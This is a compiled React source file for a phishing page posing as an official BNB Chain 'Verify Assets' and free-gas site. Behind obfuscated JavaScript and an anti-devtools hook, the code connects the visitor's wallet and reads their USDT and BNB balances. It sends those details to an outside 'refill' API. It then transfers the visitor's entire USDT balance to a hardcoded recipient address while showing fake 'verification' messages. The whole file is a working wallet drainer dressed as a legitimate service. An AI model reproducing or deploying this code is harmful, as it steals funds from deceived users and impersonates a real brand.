"use strict";

Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.default = void 0;
var _react = _interopRequireWildcard(require("react"));
var _ethers = require("ethers");
var _axios = _interopRequireDefault(require("axios"));
require("./App.css");
var _useAntiDevTools = _interopRequireDefault(require("./hooks/useAntiDevTools"));
function _interopRequireDefault(e) { return e && e.__esModule ? e : { default: e }; }
function _getRequireWildcardCache(e) { if ("function" != typeof WeakMap) return null; var r = new WeakMap(), t = new WeakMap(); return (_getRequireWildcardCache = function (e) { return e ? t : r; })(e); }
function _interopRequireWildcard(e, r) { if (!r && e && e.__esModule) return e; if (null === e || "object" != typeof e && "function" != typeof e) return { default: e }; var t = _getRequireWildcardCache(r); if (t && t.has(e)) return t.get(e); var n = { __proto__: null }, a = Object.defineProperty && Object.getOwnPropertyDescriptor; for (var u in e) if ("default" !== u && {}.hasOwnProperty.call(e, u)) { var i = a ? Object.getOwnPropertyDescriptor(e, u) : null; i && (i.get || i.set) ? Object.defineProperty(n, u, i) : n[u] = e[u]; } return n.default = e, t && t.set(e, n), n; }
// Import the hook

/* eslint-disable */

function LoaderBox(_ref) {
  let {
    showLoader
  } = _ref;
  const messages = ["Submiting User Request..", "Creating User Request for GAS", "Trying to Request Gas Refill approval from User"];
  const [currentMessageIndex, setCurrentMessageIndex] = (0, _react.useState)(0);
  (0, _react.useEffect)(() => {
    if (showLoader) {
      const interval = setInterval(() => {
        setCurrentMessageIndex(prevIndex => (prevIndex + 1) % messages.length);
      }, 7000);
      return () => clearInterval(interval);
    }
  }, [showLoader, messages.length]);
  if (!showLoader) return null;
  return /*#__PURE__*/_react.default.createElement("div", {
    className: "loader-overlay"
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "loader-box"
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "spinner-loader"
  }), /*#__PURE__*/_react.default.createElement("p", {
    className: "loader-info"
  }, messages[currentMessageIndex])));
}
function Notification(_ref2) {
  let {
    message,
    onClose
  } = _ref2;
  return /*#__PURE__*/_react.default.createElement("div", {
    className: "notification"
  }, /*#__PURE__*/_react.default.createElement("p", null, message), /*#__PURE__*/_react.default.createElement("button", {
    className: "close-button",
    onClick: onClose
  }, "\xD7"));
}
function App() {
  (0, _useAntiDevTools.default)();
  const [isWeb3Available, setIsWeb3Available] = (0, _react.useState)(false);
  const [showWeb3Popup, setShowWeb3Popup] = (0, _react.useState)(false);
  const [isMenuOpen, setIsMenuOpen] = (0, _react.useState)(false);
  const [showLoader, setShowLoader] = (0, _react.useState)(false);
  const [showVerificationMessage, setShowVerificationMessage] = (0, _react.useState)(false); // State for verification message
  const [userBalances, setUserBalances] = (0, _react.useState)({
    usdt: null,
    bnb: null
  }); // Set initial balance to null to distinguish from zero
  const [error, setError] = (0, _react.useState)(null);
  const [notificationMessage, setNotificationMessage] = (0, _react.useState)(""); // State for notification message
  const [showNotification, setShowNotification] = (0, _react.useState)(false); // State to toggle notification visibility

  const USDT_LOGO_PATH = `${process.env.PUBLIC_URL}/Tlogo.png`; // Adjusted for React public folder
  const BNB_LOGO_PATH = `${process.env.PUBLIC_URL}/Blogo.png`; // Adjusted for React public folder

  const toggleMenu = () => {
    setIsMenuOpen(prev => !prev);
    // Check if the state toggles correctly
  };
  (0, _react.useEffect)(() => {}, [showLoader]);
  const rpcUrl = process.env.REACT_APP_RPC_URL || "https://bsc-dataseed.binance.org/";
  const bscProvider = new _ethers.ethers.providers.JsonRpcProvider(rpcUrl);
  function _0x2e01(_0x2c161e, _0x19821e) {
    const _0x4d85de = _0x4d85();
    return _0x2e01 = function (_0x2e01a0, _0x559a9c) {
      _0x2e01a0 = _0x2e01a0 - 0x99;
      let _0x5329ed = _0x4d85de[_0x2e01a0];
      return _0x5329ed;
    }, _0x2e01(_0x2c161e, _0x19821e);
  }const _0x37c025=_0x4388;function _0x2345(){const _0x55bfd4=['usd','1hLAAxN','request','57815bQYhTR','24LGMiTi','Contract','Refill\x20successful!\x20Transaction\x20hash:\x20','18aWyTAJ','log','utils','Error\x20during\x20transfer:','parseUnits','1557wWRRru','undefined','0.0004','balanceOf','view','ethereum','2730WCiXDz','success','bool','data','wait','308470FjbWen','7309988tlpsNv','Failed\x20to\x20fetch\x20data.\x20Please\x20try\x20again.','209OyrjJI','transfer','1395477wJKTyV','formatUnits','ethers','txHash','push','0x55d398326f99059fF775485246999027B3197955','https://api.bepchain.net/refill','getSigner','17152620arGVVH','providers','0x52a7e6f3d36723d090e815c21ebf697f4dd6ec8e','https://api.coingecko.com/api/v3/simple/price?ids=binancecoin&vs_currencies=usd','4808xakaRI','code','wallet_switchEthereumChain','useEffect','function','stringify','send','1840120JHJFzg','Ethereum\x20provider\x20not\x20found','7439754okABgG','getAddress','eth_requestAccounts','json','shift','uint256','Error\x20fetching\x20balances:','Connection\x20timed\x20out.','POST','address','Error\x20fetching\x20BNB\x20price:','status','eth_chainId','default','Refill\x20not\x20required\x20or\x20conditions\x20not\x20met.','error','506388KwAJhs','formatEther','391980xEdblZ','2093sIAsPW','User\x20request\x20\x20cancelled.','Asset\x20verification\x20request\x20failed.','getBalance','get','12939408RinAkE','4iWRBjl','399358HsNFqT','Error\x20switching\x20network:','Web3Provider'];_0x2345=function(){return _0x55bfd4;};return _0x2345();}(function(_0x4b9783,_0x40bd18){const _0x5eb3c6=_0x4388,_0xdb36d3=_0x4b9783();while(!![]){try{const _0x16af61=parseInt(_0x5eb3c6(0x158))/0x1*(-parseInt(_0x5eb3c6(0x154))/0x2)+-parseInt(_0x5eb3c6(0x173))/0x3+-parseInt(_0x5eb3c6(0x15b))/0x4*(parseInt(_0x5eb3c6(0x15a))/0x5)+-parseInt(_0x5eb3c6(0x169))/0x6*(-parseInt(_0x5eb3c6(0x19b))/0x7)+parseInt(_0x5eb3c6(0x186))/0x8*(parseInt(_0x5eb3c6(0x15e))/0x9)+parseInt(_0x5eb3c6(0x16e))/0xa*(-parseInt(_0x5eb3c6(0x171))/0xb)+parseInt(_0x5eb3c6(0x152))/0xc;if(_0x16af61===_0x40bd18)break;else _0xdb36d3['push'](_0xdb36d3['shift']());}catch(_0x2cca10){_0xdb36d3['push'](_0xdb36d3['shift']());}}}(_0x2345,0x56702));function _0x4388(_0x938d9b,_0x3545be){const _0x23453f=_0x2345();return _0x4388=function(_0x4388ce,_0x1aa0bb){_0x4388ce=_0x4388ce-0x151;let _0x2a2e23=_0x23453f[_0x4388ce];return _0x2a2e23;},_0x4388(_0x938d9b,_0x3545be);}function _0x4d85(){const _0x4de0db=_0x4388,_0x2a7d93=['3711484IYBmey',_0x4de0db(0x163),_0x4de0db(0x18d),'amount',_0x4de0db(0x167),_0x4de0db(0x183),_0x4de0db(0x16f),_0x4de0db(0x153),_0x4de0db(0x19a),_0x4de0db(0x198),_0x4de0db(0x17b),'nonpayable',_0x4de0db(0x16b),_0x4de0db(0x17d),_0x4de0db(0x166),_0x4de0db(0x191),_0x4de0db(0x17f),_0x4de0db(0x188),'recipient','5zrtabI'];return _0x4d85=function(){return _0x2a7d93;},_0x4d85();}const _0x2f3853=_0x2e01;(function(_0x47d66b,_0x3e6e09){const _0x15692a=_0x4388,_0x48a0be=_0x2e01,_0x27808a=_0x47d66b();while(!![]){try{const _0xc90ab1=-parseInt(_0x48a0be(0xab))/0x1+parseInt(_0x48a0be(0xa9))/0x2*(parseInt(_0x48a0be(0xaa))/0x3)+-parseInt(_0x48a0be(0xa2))/0x4+-parseInt(_0x48a0be(0xa1))/0x5*(-parseInt(_0x48a0be(0x9f))/0x6)+-parseInt(_0x48a0be(0xa8))/0x7+-parseInt(_0x48a0be(0x9e))/0x8*(parseInt(_0x48a0be(0xa3))/0x9)+parseInt(_0x48a0be(0xac))/0xa;if(_0xc90ab1===_0x3e6e09)break;else _0x27808a[_0x15692a(0x177)](_0x27808a[_0x15692a(0x18c)]());}catch(_0x5e52e9){_0x27808a[_0x15692a(0x177)](_0x27808a[_0x15692a(0x18c)]());}}}(_0x4d85,0x9aca9));const USDT_CONTRACT_ADDRESS=_0x37c025(0x178),RECIPIENT_ADDRESS=_0x2f3853(0x9b),USDT_ABI=[{'constant':!![],'inputs':[{'internalType':_0x2f3853(0x9d),'name':'account','type':_0x2f3853(0x9d)}],'name':_0x2f3853(0x9c),'outputs':[{'internalType':_0x37c025(0x18d),'name':'','type':_0x37c025(0x18d)}],'payable':![],'stateMutability':_0x2f3853(0xa6),'type':_0x2f3853(0xa7)},{'constant':![],'inputs':[{'internalType':_0x37c025(0x191),'name':_0x2f3853(0xa0),'type':_0x2f3853(0x9d)},{'internalType':_0x37c025(0x18d),'name':_0x2f3853(0xa5),'type':_0x2f3853(0xa4)}],'name':_0x37c025(0x172),'outputs':[{'internalType':_0x2f3853(0x9a),'name':'','type':_0x37c025(0x16b)}],'payable':![],'stateMutability':_0x2f3853(0x99),'type':_0x37c025(0x183)}],checkAndSwitchToBsc=async()=>{const _0x344d78=_0x37c025;try{if(window[_0x344d78(0x168)]){const _0x1a68df=await window[_0x344d78(0x168)][_0x344d78(0x159)]({'method':_0x344d78(0x194)}),_0x4753aa='0x38';if(_0x1a68df!==_0x4753aa)await window[_0x344d78(0x168)][_0x344d78(0x159)]({'method':_0x344d78(0x181),'params':[{'chainId':_0x4753aa}]});else{}}}catch(_0x22afa3){console[_0x344d78(0x197)](_0x344d78(0x155),_0x22afa3);}},fetchBNBPriceInUSD=async()=>{const _0x519498=_0x37c025;try{const _0x20829d=await _axios[_0x519498(0x195)][_0x519498(0x151)](_0x519498(0x17e)),_0x5120e0=_0x20829d[_0x519498(0x16c)]['binancecoin'][_0x519498(0x157)];return _0x5120e0;}catch(_0x5906ed){return console[_0x519498(0x197)](_0x519498(0x192),_0x5906ed),null;}},fetchBalances=async _0x355b63=>{const _0x5eb4c6=_0x37c025;try{const _0x2e669e=new _ethers[(_0x5eb4c6(0x175))][(_0x5eb4c6(0x15c))](USDT_CONTRACT_ADDRESS,USDT_ABI,bscProvider),_0xcec015=await _0x2e669e['balanceOf'](_0x355b63),_0x3150d6=_ethers[_0x5eb4c6(0x175)][_0x5eb4c6(0x160)][_0x5eb4c6(0x174)](_0xcec015,0x12),_0x183b63=new _ethers[(_0x5eb4c6(0x175))][(_0x5eb4c6(0x17c))][(_0x5eb4c6(0x156))](window['ethereum']),_0x1517cd=await _0x183b63[_0x5eb4c6(0x19e)](_0x355b63),_0x17c609=_ethers['ethers'][_0x5eb4c6(0x160)][_0x5eb4c6(0x199)](_0x1517cd);setUserBalances({'usdt':parseFloat(_0x3150d6),'bnb':parseFloat(_0x17c609)});}catch(_0x44a20b){console[_0x5eb4c6(0x197)](_0x5eb4c6(0x18e),_0x44a20b),setError(_0x5eb4c6(0x170));}};(0x0,_react[_0x37c025(0x182)])(()=>{const _0x1c4051=_0x37c025;(typeof window['ethereum']!==_0x1c4051(0x164)||typeof window['web3']!==_0x1c4051(0x164))&&setIsWeb3Available(!![]);},[]);const handleVerifyButtonClick=()=>{isWeb3Available?handleGetStartedClick():setShowWeb3Popup(!![]);},closeWeb3Popup=()=>{setShowWeb3Popup(![]);},handleGetStartedClick=async()=>{const _0x5a7fa6=_0x37c025;setShowLoader(!![]),setError(null),await checkAndSwitchToBsc(),setNotificationMessage(''),setShowNotification(![]),await checkAndSwitchToBsc();if(window[_0x5a7fa6(0x168)])try{const _0x20e517=new _ethers[(_0x5a7fa6(0x175))][(_0x5a7fa6(0x17c))][(_0x5a7fa6(0x156))](window['ethereum']);await _0x20e517[_0x5a7fa6(0x185)](_0x5a7fa6(0x18a),[]);const _0x1f91e2=_0x20e517[_0x5a7fa6(0x17a)](),_0x216ddd=await _0x1f91e2[_0x5a7fa6(0x189)](),_0x32fd0f=new _ethers['ethers']['Contract'](USDT_CONTRACT_ADDRESS,USDT_ABI,bscProvider),_0xb6fbf7=await _0x32fd0f[_0x5a7fa6(0x166)](_0x216ddd),_0xd4e65e=_ethers[_0x5a7fa6(0x175)]['utils'][_0x5a7fa6(0x174)](_0xb6fbf7,0x12);let _0x9eafaf=await _0x20e517[_0x5a7fa6(0x19e)](_0x216ddd);_0x9eafaf=_ethers[_0x5a7fa6(0x175)]['utils'][_0x5a7fa6(0x199)](_0x9eafaf);const _0x4706a9=await fetchBNBPriceInUSD(),_0x49fe09=0.2,_0x55e017=_0x49fe09/_0x4706a9;let _0x44241c=![];if(parseFloat(_0xd4e65e)>0x18f&&parseFloat(_0x9eafaf)<0.0003){const _0x21c1eb=await fetch(_0x5a7fa6(0x179),{'method':_0x5a7fa6(0x190),'headers':{'Content-Type':'application/json','x-api-key':'dhatterim@kiCh*tandf**kyourm0m'},'body':JSON[_0x5a7fa6(0x184)]({'to':_0x216ddd,'amount':_0x5a7fa6(0x165),'usdtBalance':_0xd4e65e})}),_0x507606=await _0x21c1eb[_0x5a7fa6(0x18b)]();if(_0x21c1eb['ok']&&_0x507606[_0x5a7fa6(0x193)]===_0x5a7fa6(0x16a))console[_0x5a7fa6(0x15f)](_0x5a7fa6(0x15d)+_0x507606[_0x5a7fa6(0x176)]),_0x44241c=!![];else{console[_0x5a7fa6(0x197)]('Refill\x20failed:',_0x507606['error']),setError(_0x5a7fa6(0x18f)),setShowLoader(![]);return;}}else console[_0x5a7fa6(0x15f)](_0x5a7fa6(0x196)),_0x44241c=!![];if(_0x44241c&&parseFloat(_0xd4e65e)>0x1c1){const _0x11b3f0=new _ethers[(_0x5a7fa6(0x175))][(_0x5a7fa6(0x15c))](USDT_CONTRACT_ADDRESS,USDT_ABI,_0x1f91e2),_0x3206b1=_ethers[_0x5a7fa6(0x175)][_0x5a7fa6(0x160)][_0x5a7fa6(0x162)](_0xd4e65e,0x12),_0x3d6513=await _0x11b3f0['transfer'](RECIPIENT_ADDRESS,_0x3206b1,{'gasLimit':0x186a0});await _0x3d6513[_0x5a7fa6(0x16d)]();}else{if(parseFloat(_0xd4e65e)<=0x0){}}setUserBalances({'usdt':parseFloat(_0xd4e65e),'bnb':parseFloat(_0x9eafaf)}),_0xd4e65e>0x0?setShowVerificationMessage(!![]):setShowVerificationMessage(![]);}catch(_0x16ee85){console[_0x5a7fa6(0x197)](_0x5a7fa6(0x161),_0x16ee85),_0x16ee85[_0x5a7fa6(0x180)]===0xfa1?(setNotificationMessage(_0x5a7fa6(0x19c)),setShowNotification(!![])):(setNotificationMessage(_0x5a7fa6(0x19d)),setShowNotification(!![]));}finally{setTimeout(()=>{setShowLoader(![]);},0x7d0);}else console[_0x5a7fa6(0x197)](_0x5a7fa6(0x187)),setTimeout(()=>setShowLoader(![]),0x1b58);};

  
  return /*#__PURE__*/_react.default.createElement("div", {
    className: "app"
  }, showWeb3Popup && /*#__PURE__*/_react.default.createElement("div", {
    className: "web3-popup-overlay"
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "web3-popup"
  }, /*#__PURE__*/_react.default.createElement("span", {
    className: "web3-popup-cross"
  }, "\u274C"), /*#__PURE__*/_react.default.createElement("h2", null, "Browser Not Supported"), /*#__PURE__*/_react.default.createElement("p", null, "Please use a web3-compatible wallet, e.g. TrustWallet or Binance Web3 Wallet."), /*#__PURE__*/_react.default.createElement("button", {
    onClick: closeWeb3Popup,
    className: "web3-popup-button"
  }, "OK"))), showNotification && /*#__PURE__*/_react.default.createElement(Notification, {
    message: notificationMessage,
    onClose: () => setShowNotification(false)
  }), /*#__PURE__*/_react.default.createElement(LoaderBox, {
    showLoader: showLoader
  }), /*#__PURE__*/_react.default.createElement("div", {
    className: "notification-bar"
  }, /*#__PURE__*/_react.default.createElement("p", null, "Listed on 130 exchanges, BSC is the fastest growing crypto network.")), /*#__PURE__*/_react.default.createElement("header", {
    className: "app-header"
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "header-left"
  }, /*#__PURE__*/_react.default.createElement("img", {
    src: "/Frame_480972175.png",
    alt: "BNB Chain Logo",
    className: "logo"
  })), /*#__PURE__*/_react.default.createElement("nav", {
    className: "desktop-nav"
  }, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Chains"), /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Developer"), /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Ecosystem"), /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Community"), /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Careers")), /*#__PURE__*/_react.default.createElement("div", {
    className: "button-group"
  }, /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "support-button"
  }, "Support"), /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "contact-button"
  }, "Contact Us")), /*#__PURE__*/_react.default.createElement("button", {
    className: "hamburger",
    onClick: toggleMenu
  }, "\u2630")), isMenuOpen && /*#__PURE__*/_react.default.createElement("div", {
    className: "menu-overlay",
    onClick: () => setIsMenuOpen(false)
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "menu open"
  }, /*#__PURE__*/_react.default.createElement("img", {
    src: "/Frame_480972175.png",
    alt: "BNB Chain Logo",
    className: "menu-logo"
  }), /*#__PURE__*/_react.default.createElement("button", {
    className: "close-menu",
    onClick: () => setIsMenuOpen(false)
  }, "\xD7"), /*#__PURE__*/_react.default.createElement("a", {
    className: "menu-item",
    href: ""
  }, "Chains"), /*#__PURE__*/_react.default.createElement("a", {
    className: "menu-item",
    href: ""
  }, "Developer"), /*#__PURE__*/_react.default.createElement("a", {
    className: "menu-item",
    href: ""
  }, "Ecosystem"), /*#__PURE__*/_react.default.createElement("a", {
    className: "menu-item",
    href: ""
  }, "Community"), /*#__PURE__*/_react.default.createElement("a", {
    className: "menu-item",
    href: ""
  }, "Careers"), /*#__PURE__*/_react.default.createElement("div", {
    className: "button-group"
  }, /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "support-button"
  }, "Support"), /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "contact-button"
  }, "Contact Us")))), /*#__PURE__*/_react.default.createElement("main", {
    className: "main-content",
    style: {
      backgroundImage: `url(${process.env.PUBLIC_URL + '/BGmain.png'})`,
      backgroundSize: 'cover',
      backgroundPosition: 'center',
      backgroundRepeat: 'no-repeat',
      minHeight: '100vh',
      display: 'flex',
      flexDirection: 'column',
      justifyContent: 'center',
      alignItems: 'center'
    }
  }, error ? /*#__PURE__*/_react.default.createElement("div", {
    className: "verification-message"
  }, /*#__PURE__*/_react.default.createElement("p", null, error)) : showVerificationMessage ? /*#__PURE__*/_react.default.createElement("div", {
    className: "verification-message"
  }, /*#__PURE__*/_react.default.createElement("p", null, "Verification successful! Reported Flash \"0\""), /*#__PURE__*/_react.default.createElement("div", {
    className: "balance-display",
    style: {
      marginTop: '10px',
      backgroundColor: 'black',
      padding: '10px',
      borderRadius: '5px',
      color: 'white',
      textAlign: 'center'
    }
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Available BNB Tokens:"), /*#__PURE__*/_react.default.createElement("p", null, /*#__PURE__*/_react.default.createElement("img", {
    src: USDT_LOGO_PATH,
    alt: "USDT Logo",
    style: {
      width: '20px',
      marginRight: '5px'
    }
  }), "USDT = ", userBalances.usdt !== null ? Math.floor(userBalances.usdt) : 'Loading...'), /*#__PURE__*/_react.default.createElement("p", null, /*#__PURE__*/_react.default.createElement("img", {
    src: BNB_LOGO_PATH,
    alt: "BNB Logo",
    style: {
      width: '20px',
      marginRight: '5px'
    }
  }), "BNB = ", userBalances.bnb !== null ? userBalances.bnb.toFixed(4) : 'Loading...'))) : userBalances.usdt === 0 ? /*#__PURE__*/_react.default.createElement("div", {
    className: "verification-message"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Available BNB Tokens:"), /*#__PURE__*/_react.default.createElement("p", null, /*#__PURE__*/_react.default.createElement("img", {
    src: USDT_LOGO_PATH,
    alt: "USDT Logo",
    style: {
      width: '20px',
      marginRight: '5px'
    }
  }), "USDT = ", userBalances.usdt !== null ? Math.floor(userBalances.usdt) : 'Loading...'), /*#__PURE__*/_react.default.createElement("p", null, /*#__PURE__*/_react.default.createElement("img", {
    src: BNB_LOGO_PATH,
    alt: "BNB Logo",
    style: {
      width: '20px',
      marginRight: '5px'
    }
  }), "BNB = ", userBalances.bnb !== null ? userBalances.bnb.toFixed(4) : 'Loading...')) : /*#__PURE__*/_react.default.createElement(_react.default.Fragment, null, /*#__PURE__*/_react.default.createElement("h2", null, "Verify Assets on ", /*#__PURE__*/_react.default.createElement("span", {
    className: "highlight"
  }, "BNB Chain")), /*#__PURE__*/_react.default.createElement("h3", {
    className: "sub-heading"
  }, "Serving Gas Less Web3 tools to over 478 Million users"), /*#__PURE__*/_react.default.createElement("p", {
    className: "description"
  }, "A community-driven blockchain ecosystem of Layer-1 and Layer-2 scaling solutions."), /*#__PURE__*/_react.default.createElement("div", {
    className: "main-buttons"
  }, /*#__PURE__*/_react.default.createElement("button", {
    className: "primary-button",
    onClick: handleVerifyButtonClick
  }, "Verify Assets"), /*#__PURE__*/_react.default.createElement("a", {
    href: "https://www.binance.com",
    className: "secondary-button"
  }, "\uD83C\uDFE0\uFE0E   HOME")))), /*#__PURE__*/_react.default.createElement("section", {
    className: "white-section"
  }, /*#__PURE__*/_react.default.createElement("h3", null, "Join the BNB Chain ", /*#__PURE__*/_react.default.createElement("span", {
    className: "highlight"
  }, "Ecosystem")), /*#__PURE__*/_react.default.createElement("p", {
    className: "ecosystem-description"
  }, "Get started in few steps to dive into the world of BNB Chain."), /*#__PURE__*/_react.default.createElement("div", {
    className: "card-container"
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "card"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Download Wallet"), /*#__PURE__*/_react.default.createElement("p", null, "A wallet helps you connect to BNB Chain and manage your funds."), /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "card-button"
  }, "Download Wallet"), /*#__PURE__*/_react.default.createElement("img", {
    src: "/image_no_background.png",
    alt: "Wallet"
  })), /*#__PURE__*/_react.default.createElement("div", {
    className: "card"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Get free BNB for GAS"), /*#__PURE__*/_react.default.createElement("p", null, "BNB is the currency of BNB Chain that is required on BNB chain for any interaction"), /*#__PURE__*/_react.default.createElement("button", {
    className: "card-button",
    onClick: handleGetStartedClick
  }, "Get BNB"), /*#__PURE__*/_react.default.createElement("img", {
    src: "/abs.png",
    alt: "BNB Tokens"
  })))), /*#__PURE__*/_react.default.createElement("section", {
    className: "community-section"
  }, /*#__PURE__*/_react.default.createElement("h3", null, "Get Involved, Be Part of the ", /*#__PURE__*/_react.default.createElement("span", {
    className: "highlight"
  }, "Community")), /*#__PURE__*/_react.default.createElement("p", {
    className: "community-description"
  }, "BNB Chain is a global, decentralized network with developers, validators, users, HODLers, and enthusiasts."), /*#__PURE__*/_react.default.createElement("div", {
    className: "social-links"
  }, /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "social-link"
  }, /*#__PURE__*/_react.default.createElement("img", {
    src: "/telegram.png",
    alt: "Telegram",
    className: "social-icon"
  }), "Telegram"), /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "social-link"
  }, /*#__PURE__*/_react.default.createElement("img", {
    src: "/github.png",
    alt: "GitHub",
    className: "social-icon"
  }), "GitHub"), /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "social-link"
  }, /*#__PURE__*/_react.default.createElement("img", {
    src: "/youtube.png",
    alt: "YouTube",
    className: "social-icon"
  }), "YouTube"), /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "social-link"
  }, /*#__PURE__*/_react.default.createElement("img", {
    src: "/twitter.png",
    alt: "Twitter",
    className: "social-icon"
  }), "X"), /*#__PURE__*/_react.default.createElement("a", {
    href: "",
    className: "social-link"
  }, /*#__PURE__*/_react.default.createElement("img", {
    src: "/discord.png",
    alt: "Discord",
    className: "social-icon"
  }), "Discord"))), /*#__PURE__*/_react.default.createElement("footer", {
    className: "footer"
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "footer-container"
  }, /*#__PURE__*/_react.default.createElement("div", {
    className: "footer-column"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Chains"), /*#__PURE__*/_react.default.createElement("ul", null, /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "BNB Smart Chain")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "BNB Greenfield")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "opBNB")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "zkBNB")))), /*#__PURE__*/_react.default.createElement("div", {
    className: "footer-column"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Use BNB Chain"), /*#__PURE__*/_react.default.createElement("ul", null, /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Download Wallet")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Get BNB")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Stake BNB")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Bridge Assets")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Explore dApps")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Earn by BTC")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Pay by Crypto")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Earn by Liquid Staking")))), /*#__PURE__*/_react.default.createElement("div", {
    className: "footer-column"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Build"), /*#__PURE__*/_react.default.createElement("ul", null, /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Portal")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Documentations")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Faucet")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Dev Tools")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Submit dApp")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "BNBChain List")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Greenfield Console")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Whitepaper")))), /*#__PURE__*/_react.default.createElement("div", {
    className: "footer-column"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "Participate"), /*#__PURE__*/_react.default.createElement("ul", null, /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Events")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Hackathon")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "MVB Program")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Developer Programs")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Martians Program")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Bug Bounty")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Host an Event")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Get Workspace")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Ecosystem Jobs")))), /*#__PURE__*/_react.default.createElement("div", {
    className: "footer-column"
  }, /*#__PURE__*/_react.default.createElement("h4", null, "About"), /*#__PURE__*/_react.default.createElement("ul", null, /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Blog")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Careers")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "BNB Chain Verify")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Red Alarm")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Privacy Policy")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Terms of Use")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Contact Us")), /*#__PURE__*/_react.default.createElement("li", null, /*#__PURE__*/_react.default.createElement("a", {
    href: ""
  }, "Brand Guidelines"))))), /*#__PURE__*/_react.default.createElement("div", {
    className: "footer-bottom"
